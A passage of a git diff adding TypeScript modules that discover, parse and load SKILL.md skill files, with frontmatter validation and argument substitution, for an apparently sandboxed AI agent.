+import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter";
+import { frontmatterToOptions, type SkillMetadata } from "@/lib/skills/skillTypes";
+
+/**
+ * Built-in commands that skills cannot shadow. Skills with these names
+ * would be unreachable via slash command, so we drop them at discovery.
+ */
+const BUILTIN_COMMANDS = ["model", "resume", "new"];
+
+/**
+ * Scan a list of directories for skills. Each directory is expected to
+ * contain one subdirectory per skill, with a SKILL.md (or skill.md)
+ * inside. Returns metadata for everything discoverable; silently skips
+ * non-directories, missing files, malformed frontmatter, and names that
+ * shadow built-in slash commands.
+ *
+ * Dedupes by name (case-insensitive); first-wins across directories so
+ * callers can list project skills before global skills and have project
+ * shadow global.
+ *
+ * @param sandbox - Connected sandbox for file ops.
+ * @param directories - Absolute paths to scan.
+ */
+export async function discoverSkills(
+  sandbox: Sandbox,
+  directories: string[],
+): Promise<SkillMetadata[]> {
+  const skills: SkillMetadata[] = [];
+  const seen = new Set<string>();
+
+  for (const dir of directories) {
+    try {
+      const stat = await sandbox.stat(dir);
+      if (!stat.isDirectory()) continue;
+    } catch {
+      continue; // directory doesn't exist
+    }
+
+    let entries;
+    try {
+      entries = await sandbox.readdir(dir, { withFileTypes: true });
+    } catch {
+      continue;
+    }
+
+    for (const entry of entries) {
+      if (!entry.isDirectory()) continue;
+
+      const skillDir = path.join(dir, entry.name);
+      const skillFile = await findSkillFile(sandbox, skillDir);
+      if (!skillFile) continue;
+
+      let content: string;
+      try {
+        content = await sandbox.readFile(skillFile, "utf-8");
+      } catch {
+        continue;
+      }
+
+      const parsed = parseSkillFrontmatter(content);
+      if (!parsed.success) continue;
+      const frontmatter = parsed.data;
+
+      if (BUILTIN_COMMANDS.includes(frontmatter.name.toLowerCase())) {
+        console.warn(
+          `[discoverSkills] Skipping "${frontmatter.name}" in ${skillDir} — name shadows built-in /${frontmatter.name}`,
+        );
+        continue;
+      }
+
+      const normalized = frontmatter.name.toLowerCase();
+      if (seen.has(normalized)) continue;
+      seen.add(normalized);
+
+      skills.push({
+        name: frontmatter.name,
+        description: frontmatter.description,
+        path: skillDir,
+        filename: path.basename(skillFile),
+        options: frontmatterToOptions(frontmatter),
+      });
+    }
+  }
+
+  return skills;
+}
diff --git a/lib/skills/extractSkillBody.ts b/lib/skills/extractSkillBody.ts
new file mode 100644
index 000000000..d1dcb3f5e
--- /dev/null
+++ b/lib/skills/extractSkillBody.ts
@@ -0,0 +1,14 @@
+/**
+ * Strip the YAML frontmatter from a SKILL.md file and return just the
+ * markdown body. Returns the entire content (trimmed) when no
+ * frontmatter is present.
+ *
+ * @param fileContent - Full file content read from sandbox.
+ */
+export function extractSkillBody(fileContent: string): string {
+  const match = fileContent.match(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/);
+  if (match) {
+    return fileContent.slice(match[0].length).trim();
+  }
+  return fileContent.trim();
+}
diff --git a/lib/skills/findSkillFile.ts b/lib/skills/findSkillFile.ts
new file mode 100644
index 000000000..a81b9e415
--- /dev/null
+++ b/lib/skills/findSkillFile.ts
@@ -0,0 +1,33 @@
+import * as path from "path";
+import type { Sandbox } from "@/lib/sandbox/interface";
+
+/**
+ * Locate the SKILL.md file inside a candidate skill directory. Prefers
+ * uppercase `SKILL.md` (the project convention) but falls back to
+ * lowercase `skill.md` for skills that ship the lowercase name. Returns
+ * `null` when neither file exists so callers can skip the entry.
+ *
+ * Probes via `sandbox.access` (which throws on missing) rather than
+ * `readdir` so we don't pay the cost of listing a directory whose
+ * contents we don't otherwise need.
+ *
+ * @param sandbox - Connected sandbox handle.
+ * @param skillDir - Absolute path to the candidate skill directory.
+ */
+export async function findSkillFile(sandbox: Sandbox, skillDir: string): Promise<string | null> {
+  const uppercase = path.join(skillDir, "SKILL.md");
+  const lowercase = path.join(skillDir, "skill.md");
+
+  try {
+    await sandbox.access(uppercase);
+    return uppercase;
+  } catch {
+    // try lowercase
+  }
+  try {
+    await sandbox.access(lowercase);
+    return lowercase;
+  } catch {
+    return null;
+  }
+}
diff --git a/lib/skills/getGlobalSkillsDirectory.ts b/lib/skills/getGlobalSkillsDirectory.ts
new file mode 100644
index 000000000..788a6dfc7
--- /dev/null
+++ b/lib/skills/getGlobalSkillsDirectory.ts
@@ -0,0 +1,14 @@
+import * as path from "path";
+
+/**
+ * Resolve the absolute path to the global skills directory under a
+ * given `$HOME`. This is where `installSessionGlobalSkills` lays down
+ * skills at sandbox provisioning time via `npx skills add ... -g`
+ * (today: `recoup-api`, `artist-workspace`).
+ *
+ * @param homeDirectory - The sandbox's resolved $HOME (e.g.
+ *   `/home/vercel-sandbox`, or `/root` on the open-agents base image).
+ */
+export function getGlobalSkillsDirectory(homeDirectory: string): string {
+  return path.posix.join(homeDirectory, ".agents", "skills");
+}
diff --git a/lib/skills/getSandboxSkillDirectories.ts b/lib/skills/getSandboxSkillDirectories.ts
new file mode 100644
index 000000000..81645ea46
--- /dev/null
+++ b/lib/skills/getSandboxSkillDirectories.ts
@@ -0,0 +1,16 @@
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory";
+import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory";
+
+/**
+ * Resolve the directory list to scan when discovering skills for a
+ * sandbox. Currently just one path — `${HOME}/.agents/skills/` —
+ * because all skills are provisioned globally at sandbox startup via
+ * `installSessionGlobalSkills` rather than bundled into the cloned repo.
+ *
+ * @param sandbox - Connected sandbox handle.
+ */
+export async function getSandboxSkillDirectories(sandbox: Sandbox): Promise<string[]> {
+  const homeDirectory = await resolveSandboxHomeDirectory(sandbox);
+  return [getGlobalSkillsDirectory(homeDirectory)];
+}
diff --git a/lib/skills/getSkills.ts b/lib/skills/getSkills.ts
new file mode 100644
index 000000000..d2d29ed7d
--- /dev/null
+++ b/lib/skills/getSkills.ts
@@ -0,0 +1,22 @@
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
+
+/**
+ * Read the discovered skill catalog out of the agent's
+ * `experimental_context`. The catalog is populated by the chat handler
+ * via `discoverSkills(sandbox, getSandboxSkillDirectories(sandbox))`
+ * before workflow start, then threaded through as
+ * `AgentContext.skills`. Returns `[]` when the context shape is wrong
+ * or no skills were discovered.
+ *
+ * Lives in its own file so consumers (the `skill` tool today, future
+ * skill-aware system prompts tomorrow) share one accessor instead of
+ * each reimplementing the context-cast.
+ *
+ * @param experimental_context - Opaque context object passed by AI SDK to tool execute.
+ */
+export function getSkills(experimental_context: unknown): SkillMetadata[] {
+  if (!isAgentContext(experimental_context)) return [];
+  const ctx = experimental_context as { skills?: SkillMetadata[] };
+  return ctx.skills ?? [];
+}
diff --git a/lib/skills/injectSkillDirectory.ts b/lib/skills/injectSkillDirectory.ts
new file mode 100644
index 000000000..cf4bf58d5
--- /dev/null
+++ b/lib/skills/injectSkillDirectory.ts
@@ -0,0 +1,11 @@
+/**
+ * Prepend a `Skill directory: <absolute-path>` header to a skill body
+ * so the model can construct full paths to scripts and resources living
+ * alongside SKILL.md (e.g. `${skillDir}/scripts/check.sh`).
+ *
+ * @param body - Skill body (after frontmatter strip).
+ * @param skillDir - Absolute sandbox path to the skill directory.
+ */
+export function injectSkillDirectory(body: string, skillDir: string): string {
+  return `Skill directory: ${skillDir}\n\n${body}`;
+}
diff --git a/lib/skills/parseSkillFrontmatter.ts b/lib/skills/parseSkillFrontmatter.ts
new file mode 100644
index 000000000..3d2888d76
--- /dev/null
+++ b/lib/skills/parseSkillFrontmatter.ts
@@ -0,0 +1,52 @@
+import { skillFrontmatterSchema } from "@/lib/skills/skillTypes";
+
+/**
+ * Parse YAML frontmatter from SKILL.md content. Returns the Zod
+ * `safeParse` shape so callers can branch cleanly on success.
+ *
+ * Intentionally a hand-rolled subset of YAML (one-line `key: value`
+ * with `"…"` / `'…'` quoting + unquoted `true`/`false`) so we don't
+ * pull a YAML dep just to read a 3-line block.
+ *
+ * @param content - Full SKILL.md content (including the leading `---`).
+ */
+export function parseSkillFrontmatter(
+  content: string,
+): ReturnType<typeof skillFrontmatterSchema.safeParse> {
+  const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/);
+  if (!match?.[1]) {
+    return {
+      success: false,
+      error: new Error("No frontmatter found") as never,
+    };
+  }
+
+  const yaml = match[1];
+  const parsed: Record<string, unknown> = {};
+
+  for (const line of yaml.split("\n")) {
+    const trimmed = line.trim();
+    if (!trimmed || trimmed.startsWith("#")) continue;
+
+    const colonIndex = trimmed.indexOf(":");
+    if (colonIndex === -1) continue;
+
+    const key = trimmed.slice(0, colonIndex).trim();
+    // Only split on the first colon so values like URLs stay intact.
+    let value: string | boolean = trimmed.slice(colonIndex + 1).trim();
+
+    if (value.startsWith('"') && value.endsWith('"')) {
+      value = value.slice(1, -1).replace(/\\"/g, '"');
+    } else if (value.startsWith("'") && value.endsWith("'")) {
+      value = value.slice(1, -1).replace(/\\'/g, "'");
+    } else if (value === "true") {
+      value = true;
+    } else if (value === "false") {
+      value = false;
+    }
+
+    parsed[key] = value;
+  }
+
+  return skillFrontmatterSchema.safeParse(parsed);
+}
diff --git a/lib/skills/skillTypes.ts b/lib/skills/skillTypes.ts
new file mode 100644
index 000000000..77fffd055
--- /dev/null
+++ b/lib/skills/skillTypes.ts
@@ -0,0 +1,76 @@
+import { z } from "zod";
+
+/**
+ * Zod schema for skill frontmatter YAML validation. Defines the
+ * expected structure at the top of SKILL.md files.
+ */
+export const skillFrontmatterSchema = z.object({
+  name: z.string().min(1, "Skill name cannot be empty").describe("Unique name of the skill"),
+  description: z
+    .string()
+    .min(1, "Skill description cannot be empty")
+    .describe("Short description for the agent"),
+  version: z.string().optional().describe("Skill version"),
+  "disable-model-invocation": z
+    .boolean()
+    .optional()
+    .describe("If true, the model cannot invoke this skill automatically"),
+  "user-invocable": z
+    .boolean()
+    .optional()
+    .describe("If false, users cannot invoke this skill via slash command"),
+  "allowed-tools": z
+    .string()
+    .optional()
+    .describe("Comma-separated list of allowed tools when skill is active"),
+  context: z.enum(["fork"]).optional().describe("Execution context for the skill"),
+  agent: z.string().optional().describe("Agent type to use for execution"),
+});
+
+export type SkillFrontmatter = z.infer<typeof skillFrontmatterSchema>;
+
+/**
+ * Normalized skill options derived from frontmatter — camelCase fields,
+ * comma-separated lists pre-split.
+ */
+export interface SkillOptions {
+  disableModelInvocation?: boolean;
+  userInvocable?: boolean;
+  allowedTools?: string[];
+  context?: "fork";
+  agent?: string;
+}
+
+/**
+ * Skill metadata stored on `AgentContext.skills`. Contains only what
+ * `skillTool` needs at invocation time — the SKILL.md body is loaded
+ * lazily.
+ */
+export interface SkillMetadata {
+  /** Unique name of the skill. */
+  name: string;
+  /** Short description for the agent. */
+  description: string;
+  /** Absolute sandbox path to the skill directory. */
+  path: string;
+  /** Filename of the skill file (`SKILL.md` or `skill.md`). */
+  filename: string;
+  /** Skill options from frontmatter. */
+  options: SkillOptions;
+}
+
+/**
+ * Normalize parsed frontmatter to {@link SkillOptions}.
+ */
+export function frontmatterToOptions(frontmatter: SkillFrontmatter): SkillOptions {
+  return {
+    disableModelInvocation: frontmatter["disable-model-invocation"],
+    userInvocable: frontmatter["user-invocable"],
+    allowedTools: frontmatter["allowed-tools"]
+      ?.split(",")
+      .map(t => t.trim())
+      .filter(Boolean),
+    context: frontmatter.context,
+    agent: frontmatter.agent,
+  };
+}
diff --git a/lib/skills/substituteArguments.ts b/lib/skills/substituteArguments.ts
new file mode 100644
index 000000000..44500bc58
--- /dev/null
+++ b/lib/skills/substituteArguments.ts
@@ -0,0 +1,14 @@
+/**
+ * Replace all occurrences of `$ARGUMENTS` in a skill body with the
+ * provided args string (or empty string when no args were passed).
+ *
+ * Used by `skillTool` after loading SKILL.md so slash-command-style
+ * invocations like `/commit -m "fix"` thread the arg suffix through to
+ * the skill's body text.
+ *
+ * @param body - Skill body (markdown after frontmatter).
+ * @param args - Optional arguments passed by the model.
+ */
+export function substituteArguments(body: string, args?: string): string {
+  return body.replace(/\$ARGUMENTS/g, args ?? "");
+}